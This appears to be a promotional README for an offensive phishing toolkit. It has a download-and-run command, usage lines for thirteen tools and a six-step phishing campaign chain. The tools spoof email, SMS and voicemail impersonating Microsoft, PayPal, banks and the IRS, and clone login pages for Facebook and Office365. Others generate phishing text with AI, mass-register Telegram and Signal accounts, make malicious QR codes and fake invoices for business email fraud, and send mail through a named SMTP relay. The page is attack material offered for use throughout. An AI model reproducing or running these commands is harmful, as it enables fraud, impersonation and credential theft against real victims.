

DOWNLOAD

```
wget https://tool.electronic Hubb.com/Toolkit_2_Phishing_Social.zip
unzip Toolkit_2_Phishing_Social.zip -d ~/toolkits/Phishing_Social
cd ~/toolkits/Phishing_Social && python3 phishing_social.py
```

TOOLS

1. email_spoofers.py – Email Spoofing

Send emails with spoofed sender. Supports HTML, attachments, custom headers.

```
python3 email_spoofers.py --from "ceo@target.com" --to victim@gmail.com --subject "Urgent"
--body "Check this"
python3 email_spoofers.py --from "support@microsoft.com" --to targets.txt --template
phishing.html
python3 email_spoofers.py --smtp 158.220.90.35 --port 587 --user aeromail_smtp --pass PASS
```

2. sms_spoofers.py – SMS Spoofing

Send SMS with spoofed sender ID.

```
python3 sms_spoofers.py --to +123****7890 --sender "PayPal" --message "Account locked"
python3 sms_spoofers.py --list phones.txt --sender "Bank" --message-file sms.txt
```

3. site_cloner.py – Website Cloner

Clone any website pixel-perfect for phishing.

```
python3 site_cloner.py --url https://facebook.com/login --output fb-clone
python3 site_cloner.py --url https://office365.com/login --output o365-clone --beef
```

4. campaign_manager.py – Campaign Manager

Multi-stage phishing campaigns with tracking.

```
python3 campaign_manager.py --new-campaign --name "Q4-Phish" --targets targets.txt
python3 campaign_manager.py --send --campaign Q4-Phish --template invoice.html
python3 campaign_manager.py --stats --campaign Q4-Phish
```

5. ai_content_generator.py – AI Content Generator

Generate convincing phishing content using AI.

```
python3 ai_content_generator.py --type email --context "fake invoice"
python3 ai_content_generator.py --type sms --context "bank verification"
```

6. telegram_auto_reg.py – Telegram Auto Registration

Automate Telegram account creation.

```
python3 telegram_auto_reg.py --count 5 --output accounts.json
```

7. signal_auto_reg.py – Signal Auto Registration

Automate Signal account creation.

```
python3 signal_auto_reg.py --count 3 --output signal-accounts.json
```

8. voicemail_spoofers.py – Voicemail Spoofing

Send spoofed voicemail notifications (vishing).

```
python3 voicemail_spoofers.py --to +123****7890 --caller "IRS" --message "warrant"
```

9. qr_code_phisher.py – QR Code Phishing

Generate malicious QR codes.

```
python3 qr_code_phisher.py --url https://evil.com/fake-login --output qr.png
```

10. invoice_generator.py – Fake Invoice Generator

Generate realistic invoice PDFs for BEC attacks.

```
python3 invoice_generator.py --company "Acme Corp" --amount 48500 --account "****4521"
```

11. smishing_kit.py – SMS Phishing Kit

Complete smishing toolkit.

```
python3 smishing_kit.py --template bank-alert --phone +123****7890
```

12. voice_phisher.py – Vishing Script Generator

Generate realistic vishing scripts.

```
python3 voice_phisher.py --scenario bank-fraud --output script.txt
```

13. social_mapper.py – Social Media Mapper

Map target's social media presence.

```
python3 social_mapper.py --email target@company.com
```

```
python3 social_mapper.py --username johndoe --platforms all
```

ATTACK CHAIN: PHISHING CAMPAIGN

```
# Step 1: Gather targets (from Toolkit 1 recon)
python3 social_mapper.py --email target@company.com

# Step 2: Clone target's login page
python3 site_cloner.py --url https://target-portal.com/login --output portal-clone --beef

# Step 3: Generate convincing content
python3 ai_content_generator.py --type email --context "password reset required"

# Step 4: Create campaign
python3 campaign_manager.py --new-campaign --name "PasswordReset" --targets targets.txt

# Step 5: Send via Aeromail (high delivery)
python3 email_spoofers.py --smtp 158.220.90.35 --port 587 --user aeromail_smtp --pass PASS --template phishing.html --to targets.txt

# Step 6: Monitor results
python3 campaign_manager.py --stats --campaign PasswordReset
```

By Mr Pilot Annis | Contact: t.me/rick_ene